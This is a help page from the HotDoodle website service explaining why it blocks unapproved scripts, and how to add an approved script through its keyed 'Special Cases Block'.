While scripts can be useful, they can also be used to break a system. They can send the logins or keystrokes of your visitors elsewhere, they can install malware, they can pop-up porn, or can attack the server or its disks. Many scripts do not do any of these things, but they could, and if you are not the author of the script you probably do not really know what it does.

A general hosting company does not care. If you mess it up they will in esssence say "too bad, do you want the computer wiped and reinitialized?". To protect you from messing up others they then use some really convoluted "virtual server" schemes that require that you become a Linux administrator -- but they offer "really easy" control panels to help you through the many many things you must now get right.

HotDoodle takes responsibility for its sites, and toward that we do not allow unapproved scripts on our servers.

Add the Special Cases Block

HotDoodle allows integration with approved third party codes for use in the Special Cases Block. this blocks allows the ability to embed special HTML and scripts. Approval for the key to use the Special Cases Block can be obtained by emailing the code to help@hotDoodle.com. The Special Cases Key must be obtained for the Special Cases Block to function correctly.

Steps: How to Add the Special Cases Block

1. On the HotDoodle Toolbar, click on the "Block" tab.

2. Click on the "Add Block" button.

3. On the webpage, click on the "Add Here" button where the block will display.

4. Click on the "Special Cases" block.

5. Click on the "Insert this block" button.

6. Paste the Special Cases Key provided when code was submitted for approval to help@HotDoodle.com.

7. Paste the embed code into the [Script] box.

8. Click on the "Save" button.
